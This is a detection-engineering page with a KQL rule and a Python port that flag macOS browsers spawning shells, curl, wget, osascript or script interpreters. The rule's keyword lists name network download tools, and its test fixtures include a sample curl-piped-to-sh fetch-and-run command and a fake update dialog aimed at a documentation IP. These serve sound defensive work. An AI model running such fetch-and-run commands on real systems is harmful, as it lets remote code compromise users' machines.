# macOS Suspicious Shell or Direct Process Execution from Browser

## Query Information

#### MITRE ATT&CK Technique(s)

| Technique ID | Title    | Link    |
| ---  | --- | --- |
| T1059 | Command and Scripting Interpreter | https://attack.mitre.org/techniques/T1059/ |

#### Description
This rule detects suspicious command-line activity whose parent process is a web browser. It fires on two patterns: a shell (sh, bash, dash, ksh, tcsh, zsh) whose command line contains a suspicious keyword (curl, nscurl, wget, whoami, pwd), or the direct execution of a suspicious binary (curl, wget, osascript, pwsh, or any binary whose name starts with python, perl or php) without going through a shell. Either pattern with a browser as the parent can indicate a drive-by download, a malicious browser extension, or exploitation of a browser vulnerability that leads to command execution.

#### Author
- **Name:** Benjamin Zulliger
- **GitHub:** https://github.com/benscha/KQLAdvancedHunting
- **LinkedIn:** https://www.linkedin.com/in/benjamin-zulliger/

#### References


## Sentinel

```KQL
// Parent process names as they appear in InitiatingProcessFileName on macOS
let BrowserProcesses = dynamic([
    "Google Chrome",
    "firefox",
    "Opera",
    "Safari",
    "com.apple.WebKit.WebContent",
    "Microsoft Edge"
]);
let ShellProcesses = dynamic(["sh", "bash", "dash", "ksh", "tcsh", "zsh"]);
// has_any matches whole terms: "curl" hits "/usr/bin/curl -s ..." but not "curly"
let SuspiciousShellKeywords = dynamic(["curl", "nscurl", "wget", "whoami", "pwd"]);
let SuspiciousDirectProcesses = dynamic(["curl", "wget", "osascript", "pwsh"]);
// ---- Main Query ----
DeviceProcessEvents
// Lookback window; align it with the rule's run frequency to avoid gaps or duplicate alerts
| where Timestamp > ago(9m)
| where ActionType in ("ProcessCreated", "ProcessStarted")
// Parent process is a browser. Chrome child processes are named "Google Chrome Helper (...)";
// startswith_cs is case-sensitive, in~ is not
| where InitiatingProcessFileName in~ (BrowserProcesses)
     or InitiatingProcessFileName startswith_cs "Google Chrome Helper"
// Two paths: Shell with suspicious arguments OR directly suspicious processes
| where
    (
        // Path 1: Shell process with suspicious keywords in the command line
        FileName in~ (ShellProcesses)
        and ProcessCommandLine has_any (SuspiciousShellKeywords)
    )
    or
    (
        // Path 2: Directly suspicious processes (curl, wget, python*, perl*, php*, osascript, pwsh);
        // startswith is case-insensitive, so python3, perl5 and php-cgi all match
        FileName in~ (SuspiciousDirectProcesses)
        or FileName startswith "python"
        or FileName startswith "perl"
        or FileName startswith "php"
    )
// Command line must not be empty (covers both paths)
| where isnotempty(ProcessCommandLine)
// Result projection
| project
    Timestamp,
    DeviceName,
    AccountName,
    InitiatingProcessFileName,
    InitiatingProcessCommandLine,
    FileName,
    ProcessCommandLine,
    FolderPath,
    ProcessId,
    InitiatingProcessId
| sort by Timestamp desc
```

## Explanation

This query detects potentially malicious activity on macOS by looking for suspicious command-line executions whose parent process is a web browser. Step by step:

1. **Identify browser processes.** It defines a list of browser process names (Google Chrome, Firefox, Opera, Safari, the WebKit content process `com.apple.WebKit.WebContent`, Microsoft Edge) and separately matches Chrome's child processes, whose names start with `Google Chrome Helper`.

2. **Identify shells and suspicious processes.** It defines the shells to watch (sh, bash, dash, ksh, tcsh, zsh), the keywords that make a shell command line suspicious (curl, nscurl, wget, whoami, pwd), and the binaries that are suspicious when launched directly (curl, wget, osascript, pwsh, and anything whose name starts with python, perl or php).

3. **Monitor process events.** It reads `DeviceProcessEvents` for process creations in the last 9 minutes; that window should match how often the rule is scheduled so that events are neither missed nor alerted on twice.

4. **Check the parent process.** It keeps only events whose initiating process is one of the browsers above. A browser spawning a shell or an interpreter is unusual and worth inspecting.

5. **Detect suspicious activity** along two paths:
   - Path 1: a shell whose command line contains one of the suspicious keywords. `has_any` matches whole terms, so `curl` in `/bin/sh -c "curl ..."` matches while `curl` embedded in a longer token does not.
   - Path 2: direct execution of curl, wget, osascript, pwsh or a python/perl/php interpreter without going through a shell.

6. **Require a non-empty command line**, so every hit carries the exact command for triage.

7. **Output relevant fields**: timestamp, device, account, the browser process and its command line, the child process and its command line, the binary's folder path, and both process IDs.

Tuning notes: browser extensions that use native messaging are launched by the browser as child processes, and such hosts are sometimes implemented as Python or shell scripts, so they will match Path 2 or Path 1; allowlist them by `FolderPath` and `InitiatingProcessFileName` rather than by binary name alone. Only Chrome's helper processes are matched by prefix; other Chromium-based browsers (for example Microsoft Edge and Opera) use similarly named helper processes, and Firefox runs web content in `plugin-container`, so a shell spawned by one of those child processes would not match. Extend the browser list or add further `startswith_cs` clauses where those browsers are in use.

This query helps identify drive-by download attacks, malicious browser extensions, and exploitation of browser vulnerabilities that leads to unauthorized command execution on macOS.
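To check the rule's logic before deploying it, here is an added Python port of the query (example code written for this page, not part of the author's repository and not the KQL above) run over constructed `DeviceProcessEvents` rows. It reproduces the case handling of `in~`, `startswith` and `startswith_cs`, and approximates `has_any` term matching by splitting the command line into alphanumeric runs, which is an approximation of Kusto's tokenizer rather than a copy of it. The event names, file paths, the 198.51.100.7 addresses and the `ExampleHost` native messaging host are all constructed for the example.

```python
import re
from dataclasses import dataclass

# Names copied from the KQL rule; matching mirrors the KQL operators used there.
BROWSER_PROCESSES = {"Google Chrome", "firefox", "Opera", "Safari",
                     "com.apple.WebKit.WebContent", "Microsoft Edge"}
CHROME_HELPER_PREFIX = "Google Chrome Helper"           # startswith_cs: case-sensitive
SHELL_PROCESSES = {"sh", "bash", "dash", "ksh", "tcsh", "zsh"}
SUSPICIOUS_SHELL_KEYWORDS = {"curl", "nscurl", "wget", "whoami", "pwd"}
SUSPICIOUS_DIRECT_PROCESSES = {"curl", "wget", "osascript", "pwsh"}
SUSPICIOUS_DIRECT_PREFIXES = ("python", "perl", "php")  # startswith: case-insensitive
ACTION_TYPES = {"ProcessCreated", "ProcessStarted"}

_BROWSERS_CI = {n.lower() for n in BROWSER_PROCESSES}   # in~ is case-insensitive
_SHELLS_CI = {n.lower() for n in SHELL_PROCESSES}
_DIRECT_CI = {n.lower() for n in SUSPICIOUS_DIRECT_PROCESSES}


@dataclass(frozen=True)
class ProcessEvent:
    """The DeviceProcessEvents columns the rule reads."""
    action_type: str
    initiating_process_file_name: str
    file_name: str
    process_command_line: str
    folder_path: str = ""


def terms(text):
    """Approximation of KQL term splitting for has_any: alphanumeric runs, case-folded.
    Assumption: Kusto's exact tokenizer is not reproduced here."""
    return {t.lower() for t in re.findall(r"[A-Za-z0-9]+", text)}


def parent_is_browser(ev):
    name = ev.initiating_process_file_name
    return name.lower() in _BROWSERS_CI or name.startswith(CHROME_HELPER_PREFIX)


def path1_shell_with_keywords(ev):
    return (ev.file_name.lower() in _SHELLS_CI
            and bool(terms(ev.process_command_line) & SUSPICIOUS_SHELL_KEYWORDS))


def path2_direct_suspicious_binary(ev):
    name = ev.file_name.lower()
    return name in _DIRECT_CI or name.startswith(SUSPICIOUS_DIRECT_PREFIXES)


def matches_rule(ev):
    return (ev.action_type in ACTION_TYPES
            and parent_is_browser(ev)
            and (path1_shell_with_keywords(ev) or path2_direct_suspicious_binary(ev))
            and ev.process_command_line != "")


# Constructed sample events (not real telemetry); 198.51.100.0/24 is a documentation range.
SAMPLE_EVENTS = {
    "chrome_helper_sh_curl": ProcessEvent(           # hit via Path 1
        "ProcessCreated", "Google Chrome Helper (Renderer)", "sh",
        '/bin/sh -c "curl -fsSL http://198.51.100.7/stage.sh | sh"', "/bin"),
    "safari_webcontent_osascript": ProcessEvent(     # hit via Path 2
        "ProcessCreated", "com.apple.WebKit.WebContent", "osascript",
        "osascript -e 'display dialog \"Update required\"'", "/usr/bin"),
    "chrome_native_messaging_host": ProcessEvent(    # benign extension host, still a Path 2 hit
        "ProcessCreated", "Google Chrome", "python3",
        "/usr/bin/python3 /Library/Application Support/ExampleHost/host.py "
        "chrome-extension://abcdefghijklmnopabcdefghijklmnop/", "/usr/bin"),
    "edge_helper_bash_wget": ProcessEvent(           # miss: Edge helper prefix is not in the rule
        "ProcessCreated", "Microsoft Edge Helper (Renderer)", "bash",
        '/bin/bash -c "wget -qO- http://198.51.100.7/x"', "/bin"),
    "terminal_zsh_curl": ProcessEvent(               # miss: parent is not a browser
        "ProcessCreated", "Terminal", "zsh",
        '/bin/zsh -c "curl http://198.51.100.7/"', "/bin"),
    "chrome_sh_empty_cmdline": ProcessEvent(         # miss: empty command line
        "ProcessCreated", "Google Chrome", "sh", "", "/bin"),
    "chrome_sh_echo_only": ProcessEvent(             # miss: shell without a suspicious keyword
        "ProcessCreated", "Google Chrome", "sh", '/bin/sh -c "echo hello"', "/bin"),
}


def run_rule(events):
    """Return the names of the events the rule would surface, in input order."""
    return [name for name, ev in events.items() if matches_rule(ev)]


if __name__ == "__main__":
    for name in run_rule(SAMPLE_EVENTS):
        print("HIT", name)
```

Running it surfaces the Chrome helper shell, the Safari osascript launch and the native messaging host, and leaves the Edge helper event untouched: the first two are the detections the rule is built for, the third is the benign case to allowlist by path, and the fourth is the coverage gap to close by adding the other browsers' helper process prefixes.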

Details

Benjamin Zulliger

Released: March 30, 2026

Tables

DeviceProcessEvents
